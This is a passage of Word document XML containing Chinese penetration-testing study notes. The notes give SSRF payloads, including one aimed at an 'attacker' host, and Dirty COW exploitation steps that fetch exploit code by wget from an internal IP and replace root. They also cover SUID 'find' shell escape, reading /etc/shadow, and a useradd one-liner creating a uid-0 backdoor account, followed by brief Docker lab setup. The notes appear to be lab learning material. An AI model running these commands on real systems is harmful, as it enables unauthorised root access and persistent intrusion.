          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dict://&lt;user-auth&gt;@&lt;host&gt;:&lt;port&gt;/d:&lt;word&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799F9DE7" w14:textId="77777777" w:rsidR="00DB5BB9" w:rsidRPr="00DB5BB9" w:rsidRDefault="00DB5BB9" w:rsidP="00DB5B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BB9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ssrf.php?url=dict://attacker:11111/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B79AC36" w14:textId="77777777" w:rsidR="00DB5BB9" w:rsidRPr="00DB5BB9" w:rsidRDefault="00DB5BB9" w:rsidP="00DB5B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BB9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SFTP://</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D09938" w14:textId="77777777" w:rsidR="00DB5BB9" w:rsidRPr="00DB5BB9" w:rsidRDefault="00DB5BB9" w:rsidP="00DB5B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BB9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ssrf.php?url=sftp://example.com:11111/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E92A7BA" w14:textId="77777777" w:rsidR="00DB5BB9" w:rsidRPr="00DB5BB9" w:rsidRDefault="00DB5BB9" w:rsidP="00DB5B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BB9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TFTP://</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B394EC1" w14:textId="77777777" w:rsidR="00DB5BB9" w:rsidRPr="00DB5BB9" w:rsidRDefault="00DB5BB9" w:rsidP="00DB5B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BB9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ssrf.php?url=tftp://example.com:12346/TESTUDPPACKET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708F2730" w14:textId="77777777" w:rsidR="00DB5BB9" w:rsidRPr="00DB5BB9" w:rsidRDefault="00DB5BB9" w:rsidP="00DB5B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BB9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>LDAP://</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDF5DEA" w14:textId="77777777" w:rsidR="00DB5BB9" w:rsidRPr="00DB5BB9" w:rsidRDefault="00DB5BB9" w:rsidP="00DB5B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BB9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ssrf.php?url=ldap://localhost:11211/%0astats%0aquit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A22AF0E" w14:textId="77777777" w:rsidR="00DB5BB9" w:rsidRPr="00DB5BB9" w:rsidRDefault="00DB5BB9" w:rsidP="00DB5B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BB9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Gopher://</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA265C8" w14:textId="77777777" w:rsidR="00DB5BB9" w:rsidRPr="00DB5BB9" w:rsidRDefault="00DB5BB9" w:rsidP="00DB5B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BB9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00DB5BB9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>作者：萧萧依依</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB5BB9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>链接：https://www.jianshu.com/p/dd46267a8947</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB5BB9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>来源：简书</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB5BB9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>著作权归作者所有。商业转载请联系作者获得授权，非商业转载请注明出处。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABA54A0" w14:textId="0E8D3026" w:rsidR="0039199F" w:rsidRPr="00DB5BB9" w:rsidRDefault="0039199F" w:rsidP="00F91404"/>
    <w:p w14:paraId="694D58A3" w14:textId="77777777" w:rsidR="0039199F" w:rsidRDefault="0039199F" w:rsidP="00F91404"/>
    <w:p w14:paraId="574E4F3D" w14:textId="77777777" w:rsidR="0039199F" w:rsidRDefault="0039199F" w:rsidP="00F91404"/>
    <w:p w14:paraId="7242B1D2" w14:textId="77777777" w:rsidR="0039199F" w:rsidRDefault="0039199F" w:rsidP="0039199F">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内网渗透</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03ACBD41" w14:textId="77777777" w:rsidR="0039199F" w:rsidRDefault="00BB3AB0" w:rsidP="0039199F">
      <w:hyperlink r:id="rId183" w:history="1">
        <w:r w:rsidR="0039199F" w:rsidRPr="00EE2BF5">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://www.bilibili.com/video/av88459896?from=search&amp;seid=12563701269010581597</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="14E512C0" w14:textId="77777777" w:rsidR="0039199F" w:rsidRDefault="00BB3AB0" w:rsidP="0039199F">
      <w:hyperlink r:id="rId184" w:history="1">
        <w:r w:rsidR="0039199F">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://www.bilibili.com/video/av33026520/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="330D02B4" w14:textId="1EFCA642" w:rsidR="0039199F" w:rsidRDefault="00082A30" w:rsidP="0039199F">
      <w:r w:rsidRPr="00082A30">
        <w:t>http://paper.vulsee.com/Micro8/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D830153" w14:textId="77777777" w:rsidR="00082A30" w:rsidRPr="00A60C00" w:rsidRDefault="00082A30" w:rsidP="0039199F"/>
    <w:p w14:paraId="152D7AA6" w14:textId="77777777" w:rsidR="0039199F" w:rsidRDefault="0039199F" w:rsidP="0039199F">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提权总结：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC7022F" w14:textId="77777777" w:rsidR="0039199F" w:rsidRDefault="0094298A" w:rsidP="003919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84C0768" wp14:editId="07C4EC50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5000625" cy="228600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B6A50" w14:textId="77777777" w:rsidR="0039199F" w:rsidRDefault="0039199F" w:rsidP="003919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</w:pPr>
    </w:p>
    <w:p w14:paraId="501A6377" w14:textId="77777777" w:rsidR="0039199F" w:rsidRPr="0039199F" w:rsidRDefault="0039199F" w:rsidP="003919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  <w:t>Linux提权的前提：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F66B55B" w14:textId="77777777" w:rsidR="0039199F" w:rsidRPr="0039199F" w:rsidRDefault="0039199F" w:rsidP="0039199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kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>拿到了一个低权限的账号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424837D4" w14:textId="77777777" w:rsidR="0039199F" w:rsidRPr="0039199F" w:rsidRDefault="0039199F" w:rsidP="0039199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kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>能上传和下载文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67929CB3" w14:textId="77777777" w:rsidR="0039199F" w:rsidRDefault="0039199F" w:rsidP="0039199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kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>机器上有python、java环境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E927350" w14:textId="77777777" w:rsidR="00162B31" w:rsidRPr="00162B31" w:rsidRDefault="00162B31" w:rsidP="00162B31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5EC0AB" w14:textId="77777777" w:rsidR="0039199F" w:rsidRDefault="00162B31" w:rsidP="004F1A15">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r w:rsidRPr="004F1A15">
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脏牛提权</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75123CA8" w14:textId="77777777" w:rsidR="00162B31" w:rsidRDefault="00162B31" w:rsidP="0039199F">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aa"/>
        </w:rPr>
        <w:t>漏洞范围</w:t>
      </w:r>
      <w:r>
        <w:t>：Linux内核 &gt;= 2.6.22（2007年发行，到2016年10月18日才修复）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57ADDF62" w14:textId="77777777" w:rsidR="00162B31" w:rsidRDefault="00162B31" w:rsidP="0039199F">
      <w:r>
        <w:t>Exp下载</w:t>
      </w:r>
      <w:hyperlink r:id="rId186" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://github.com/FireFart/dirtycow</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="445F913C" w14:textId="77777777" w:rsidR="00162B31" w:rsidRDefault="00162B31" w:rsidP="0039199F">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve">wget </w:t>
      </w:r>
      <w:hyperlink r:id="rId187" w:history="1">
        <w:r w:rsidRPr="00EE2BF5">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://192.168.0.99/dirty.c -O /tmp/dirty.c</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="21539473" w14:textId="77777777" w:rsidR="00162B31" w:rsidRDefault="00162B31" w:rsidP="0039199F">
      <w:r>
        <w:t>gcc -pthread dirty.c -o exp -lcrypt（编译命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E72B79A" w14:textId="77777777" w:rsidR="00162B31" w:rsidRDefault="00162B31" w:rsidP="0039199F">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>exp feng （使用exp，后面的feng是密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FA4EC9" w14:textId="77777777" w:rsidR="00162B31" w:rsidRDefault="00162B31" w:rsidP="0039199F">
      <w:r>
        <w:t>root已经替换成firefart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAD4591" w14:textId="77777777" w:rsidR="00162B31" w:rsidRDefault="00162B31" w:rsidP="0039199F"/>
    <w:p w14:paraId="1452AFA2" w14:textId="77777777" w:rsidR="00162B31" w:rsidRDefault="00162B31" w:rsidP="004F1A15">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>suid</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提权</w:t>
      </w:r>
      <w:r w:rsidR="00851549">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4328992B" w14:textId="77777777" w:rsidR="0094298A" w:rsidRDefault="0094298A" w:rsidP="0039199F">
      <w:r w:rsidRPr="0094298A">
        <w:t>https://www.freebuf.com/articles/system/149118.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0788CCC2" w14:textId="77777777" w:rsidR="00851549" w:rsidRDefault="00851549" w:rsidP="0039199F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2623E28E" w14:textId="77777777" w:rsidR="00851549" w:rsidRDefault="00851549" w:rsidP="0039199F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先find</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B71E47" w14:textId="77777777"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549">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>find / -perm -u=s -type f 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11116895" w14:textId="77777777" w:rsidR="0039199F" w:rsidRDefault="00851549" w:rsidP="0039199F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后</w:t>
      </w:r>
      <w:r>
        <w:t>/usr/bin/find</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+所要运行的文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E5C6FC" w14:textId="77777777" w:rsidR="00851549" w:rsidRDefault="00851549" w:rsidP="0039199F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010FADDB" w14:textId="77777777"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549">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>find . -exec '/bin/sh' \;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518D6B25" w14:textId="77777777" w:rsidR="00851549" w:rsidRDefault="00851549" w:rsidP="0039199F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>三：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39545A50" w14:textId="77777777"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549">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>先touch XXX创建一个文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74197544" w14:textId="77777777"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549">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">然后：find / -type f -name </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>XXX</w:t>
      </w:r>
      <w:r w:rsidRPr="00851549">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -exec "whoami" \;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB4B97A" w14:textId="77777777" w:rsidR="00851549" w:rsidRDefault="00851549" w:rsidP="0039199F"/>
    <w:p w14:paraId="233C35E5" w14:textId="77777777" w:rsidR="000121D9" w:rsidRDefault="000121D9" w:rsidP="000121D9">
      <w:r>
        <w:t>cat  /etc/passwd         #查看用户信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EC4AFC" w14:textId="77777777" w:rsidR="000121D9" w:rsidRDefault="000121D9" w:rsidP="000121D9">
      <w:r>
        <w:t>cat  /etc/shadow         #查看用户的密码信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F05999D" w14:textId="77777777" w:rsidR="000121D9" w:rsidRDefault="000121D9" w:rsidP="000121D9">
      <w:r>
        <w:t>cat  /etc/group          #查看用户的组信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E2DD60" w14:textId="77777777" w:rsidR="00191C2D" w:rsidRDefault="00191C2D" w:rsidP="000121D9"/>
    <w:p w14:paraId="7E536E55" w14:textId="77777777" w:rsidR="00191C2D" w:rsidRPr="00B54C43" w:rsidRDefault="00B54C43" w:rsidP="004F1A15">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r w:rsidRPr="00B54C43">
        <w:t>利用 /etc/passwd 文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BCB780" w14:textId="77777777" w:rsidR="00B54C43" w:rsidRDefault="00BB3AB0" w:rsidP="000121D9">
      <w:hyperlink r:id="rId188" w:history="1">
        <w:r w:rsidR="00B54C43" w:rsidRPr="00EE2BF5">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://blog.csdn.net/qq_36119192/article/details/99871667</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1FD896D3" w14:textId="77777777" w:rsidR="00B54C43" w:rsidRPr="00B54C43" w:rsidRDefault="00B54C43" w:rsidP="000121D9"/>
    <w:p w14:paraId="531ED0A7" w14:textId="77777777" w:rsidR="00191C2D" w:rsidRDefault="00191C2D" w:rsidP="000121D9">
      <w:r>
        <w:t>以下这条命令直接生成一个具有root权限的用户：venus，密码为：123qwe 。前提是这条命令的执行需要root权限。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603772C1" w14:textId="77777777" w:rsidR="00191C2D" w:rsidRDefault="00191C2D" w:rsidP="000121D9">
      <w:r w:rsidRPr="00191C2D">
        <w:t>useradd -p `openssl passwd -1 -salt 'user' 123qwe` -u 0 -o -g root  -G root -s /bin/bash -d /home/user venus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3A3905" w14:textId="77777777" w:rsidR="0094298A" w:rsidRDefault="0094298A" w:rsidP="000121D9"/>
    <w:p w14:paraId="36AA45AA" w14:textId="77777777" w:rsidR="0094298A" w:rsidRDefault="0094298A" w:rsidP="000121D9"/>
    <w:p w14:paraId="3D3F6439" w14:textId="77777777" w:rsidR="0094298A" w:rsidRDefault="0094298A" w:rsidP="000121D9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>windows提权：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F4B3E7" w14:textId="77777777" w:rsidR="0094298A" w:rsidRDefault="0094298A" w:rsidP="000121D9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>systeminfo查看主机版本基本信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA66C8D" w14:textId="77777777" w:rsidR="0094298A" w:rsidRDefault="0094298A" w:rsidP="000121D9"/>
    <w:p w14:paraId="149F2994" w14:textId="77777777" w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="000121D9"/>
    <w:p w14:paraId="762AA3BB" w14:textId="6724138F" w:rsidR="00BF52E4" w:rsidRDefault="00BF52E4" w:rsidP="000121D9">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E0F366E" w14:textId="31ECEA3B" w:rsidR="00F83176" w:rsidRDefault="00F83176" w:rsidP="000121D9">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68E2973F" w14:textId="57D14678" w:rsidR="00F83176" w:rsidRDefault="00F83176" w:rsidP="000121D9">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="128949BB" w14:textId="37DE4022" w:rsidR="00F83176" w:rsidRDefault="00F83176" w:rsidP="000121D9">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="644F30D7" w14:textId="4D1195CD" w:rsidR="00F83176" w:rsidRDefault="00F83176" w:rsidP="000121D9">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36ACB051" w14:textId="19F4DAE9" w:rsidR="00F83176" w:rsidRDefault="00F83176" w:rsidP="000121D9">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="617EDB0F" w14:textId="5AA6B40D" w:rsidR="00F83176" w:rsidRDefault="00F83176" w:rsidP="000121D9">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48563C40" w14:textId="2F5241D0" w:rsidR="00F83176" w:rsidRDefault="00F83176" w:rsidP="000121D9">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01B384E2" w14:textId="5EFD8E0B" w:rsidR="00F83176" w:rsidRDefault="00F83176" w:rsidP="000121D9">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="403F21D4" w14:textId="510186B9" w:rsidR="00F83176" w:rsidRDefault="00F83176" w:rsidP="000121D9">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="429A56B3" w14:textId="35FCF5A8" w:rsidR="00F83176" w:rsidRDefault="00F83176" w:rsidP="000121D9">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="446905B3" w14:textId="42C71D20" w:rsidR="00F83176" w:rsidRDefault="00F83176" w:rsidP="00F83176">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>ocker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C6C7FC" w14:textId="77777777" w:rsidR="00F83176" w:rsidRDefault="00F83176" w:rsidP="00F83176">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ac"/>
        </w:rPr>
        <w:t>启动</w:t>
      </w:r>
      <w:r>
        <w:t>服务 通过systemctl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ac"/>
        </w:rPr>
        <w:t>启动</w:t>
      </w:r>
      <w:r>
        <w:t>服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB51D61" w14:textId="3EF2E3AA" w:rsidR="00F83176" w:rsidRDefault="00F83176" w:rsidP="00F83176">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="ac"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> systemctl start </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ac"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0714D7CA" w14:textId="45A70A7E" w:rsidR="00F83176" w:rsidRDefault="00F83176" w:rsidP="00F83176"/>
    <w:p w14:paraId="6D8C9953" w14:textId="77777777" w:rsidR="002449D8" w:rsidRDefault="00F83176" w:rsidP="00F83176">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>对靶场进行编译：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>docker-compose build</w:t>
      </w:r>
      <w:r w:rsidR="002449D8">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344A60C3" w14:textId="5C7E125E" w:rsidR="00F83176" w:rsidRDefault="00F83176" w:rsidP="00F83176">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br/>
        <w:t>运行靶场：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>docker-compose up -d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA2613B" w14:textId="5278E701" w:rsidR="002449D8" w:rsidRDefault="002449D8" w:rsidP="00F83176">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D672D5F" w14:textId="77777777" w:rsidR="002449D8" w:rsidRPr="002449D8" w:rsidRDefault="002449D8" w:rsidP="002449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15250"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002449D8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="515250"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>git config --global http.proxy socks5://127.0.0.1:1080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A446516" w14:textId="77777777" w:rsidR="002449D8" w:rsidRPr="002449D8" w:rsidRDefault="002449D8" w:rsidP="002449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15250"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CE6D315" w14:textId="77777777" w:rsidR="002449D8" w:rsidRPr="002449D8" w:rsidRDefault="002449D8" w:rsidP="002449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15250"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002449D8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="515250"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
